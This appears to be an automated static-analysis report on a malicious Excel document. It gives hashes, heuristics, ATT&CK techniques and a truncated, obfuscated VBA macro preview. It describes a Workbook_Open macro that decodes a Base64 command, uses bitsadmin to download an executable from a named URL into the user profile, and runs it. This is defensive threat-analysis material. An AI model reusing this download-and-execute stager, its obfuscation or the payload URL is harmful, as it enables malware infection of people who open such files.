Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31f07867af0928c4…

MALICIOUS

Office (OLE)

48.5 KB Created: 2018-12-12 22:53:55 Authoring application: Microsoft Excel First seen: 2019-01-31
MD5: bc35881cba38d95892556a61142b1190 SHA-1: 923f338658fdc26c194b21b7a54f4a801f0f780c SHA-256: 31f07867af0928c476c3330ecea0537eb15a69bb3231d2a871e6d9909b36012f
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_BASE64_SHELL_COMMAND_STAGER indicates that the VBA macro decodes and executes a command. This command uses bitsadmin to download a file from 'https://a.uchi.moe/ymfbte.jpg' and saves it as '%USERPROFILE%\nM6cCQIbcF.exe', which is then executed. The Workbook_Open event is used to trigger this malicious behavior.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://a.uchi.moe/ymfbte.jpg Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10125 bytes
SHA-256: 99d0853e56bb2db62b5d1573d74825a1707797b42ad55cd7a05cf6cd3974209c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
FRt8pdC_.ONjqd_nmGGp2sPtOZokP
Do Until "vfzu" <> "idDaOnnH"
Dim CBYpf3MIOPga98H8wqsRobrs65diJ1bBsxMqyt As Byte
Dim HrCxeNRRjf5ba75 As CheckBox
Loop
Do Until "zNiRptkXm8X" <> "werIsZHCh_Nz6bZlS7nrXeE3im"
Dim XH9fRXyFavjYvcSXX4jWlyNFPZ9O9QXxj_B9CApyAyAmA4IJX_FKRKAh As Byte
Dim O2YiGHWvyqZSUVLtVwxjEUOx18JLeXDc_JtxYZp2ON_bs As CheckBox
Loop

Do Until "Dms8gyLtRu3kkrH7JP" <> "Zl7MJkXT5E5TzPvDvT"
Dim aM7h1rvX1Kxqf4D8nzuybFiL3Ex74kyf6xe6R1uNZutKeMhAO2l6R61Smto As Byte
Dim t3ycNVPurWFow_fWqVWpofwpB92L96JRgJATkPdxMazlHLx1vgI7OC_L As CheckBox
Loop
Do Until "EHaNcDvuLxFkDJvY1haM" <> "pJgxJAZZvLBdJwNaxOTIn_XSELwju"
Dim sEqkvf4klDalU89vkYO6SkjMPh As Byte
Dim juLr7MynCFT3XOSzJJ2fREYgcvfmZGebSL5HW4EMvp52ZrA_lb As CheckBox
Loop
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FRt8pdC_"
Dim HDLqgvaVSdUjRUDcZgAV8Rh5bkCPn49QJ76NOLpobzY8G2Mm7XdTlO_yeQN5rJqXeDXUXxLL1U3F3jwiWYROYnn47Fs88t6PG_bCb2NGJPbPV264cnfR As String
 Function YXTsNdUoNJqJM5k1hJSJbPDntkIgEtufA7qEFi7Yvqo5fkb_PiHy(w2uZYzPoG5HKFmmpyt3IWRXMaW8UvcQJCBY5HCQfz26x5ESc4Ma5Lscdbf9A252nm8)
Do Until "tTqXShvfPSigX5G" <> "afbWzH_y4bACmQRBa5QVBYQNjb"
Dim Lu6e5OrzHG_DYz As Byte
Dim tdv5QdHN7QFlEgEAMMvW6M3WgtTvGIBWdZkflV6ES7wmX As CheckBox
Loop
Do Until "QHItG4uPB4fk" <> "XWgIUEwOsGo5hW1PpC8YN9OkIB"
Dim OOEbf_4M9X57z_WoIbNJsBdj85FVXG5_SEf_lnHzmI11tEGXzR As Byte
Dim G5zPLtecj8gx1c5m As CheckBox
Loop

 Dim ngbc9_glHYKyJC_JO7JW34aIB1akSbQQ7WIStyE4ru8Q74Mx4crWFhDt_QaGh5QoF4
Do Until "tcVBdSWfiJmy2w" <> "qeEBw"
Dim byROEJg1ET_WyaV5bOjwfRqBFpkwPArxozI5JF6SueZMIO9YY As Byte
Dim vBya9gIFOGYhtj As CheckBox
Loop
Do Until "DkJq9QatTSPB_2b21" <> "pKVd83VpQ_w48et_4Ul8g_F8Aq"
Dim dJ7fQnWPsVWE_rx_ As Byte
Dim pQmyVxeA_ez3RoDWbPWKstqHeqvVlxO As CheckBox
Loop


   Dim c6t8DhWYkOqqwOOTIlkCwtg27WiBFnQBITvPSl_amk4Uy1LS_5OWGqIsX1_o8TR7
Do Until "IfRySJS" <> "pn5auwc8"
Dim CQ_mxSkP5id As Byte
Dim RoAGXPN6suUNCP6qfwR6TBrrDlIaigOWNy2 As CheckBox
Loop
Do Until "nnefIfzsKpC6V1lDblmHP6" <> "QCvFvVKd89LXPB_PHXcQeBAowj7bw"
Dim ukojrUbtCtcgqqDr8iiCJbMo8YOBERJXsqLWgwhogf_n9txT76xAWXk As Byte
Dim QV_lQEYmshDx_cpJIA As CheckBox
Loop
   
Do Until "enWioLk5_HdIAS_5_fJOiG" <> "UE46xzPum_"
Dim c364wSXpJTdNX As Byte
Dim Cc4hom9tSVvBctOwDxWzIgZGALKuiXwWEq1b3Pj As CheckBox
Loop
Do Until "FnNIeI2SiG3EeEXMdCv" <> "gbZLJ4i"
Dim X5u2w3wLOJ4V48H2lmoRPPqbUXFsGoZDN6t6gpS_RQyLSGGxX As Byte
Dim ixidkQGLRfXuC_jtzG8LKT5Ro99 As CheckBox
Loop
 Set c6t8DhWYkOqqwOOTIlkCwtg27WiBFnQBITvPSl_amk4Uy1LS_5OWGqIsX1_o8TR7 = CreateObject(HDLqgvaVSdUjRUDcZgAV8Rh5bkCPn49QJ76NOLpobzY8G2Mm7XdTlO_yeQN5rJqXeDXUXxLL1U3F3jwiWYROYnn47Fs88t6PG_bCb2NGJPbPV264cnfR)
Do Until "ZdG" <> "MPRTg11hlmlrMI5MNKNbc_IjKN2"
Dim OxkRprIQFbqgs2PdSibEuVatvKB As Byte
Dim nMEqGQ8jtAS6_C1wtfmeiKdyAsHF3V1fcpdCAthOtQfc_mbB3ipLGpbb As CheckBox
Loop
Do Until "rOpXH1qWHwaSgwv_7WtPoAyV" <> "PELSomXwMBTtCIF3jGSKJGc"
Dim vpNs6JvqZR
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.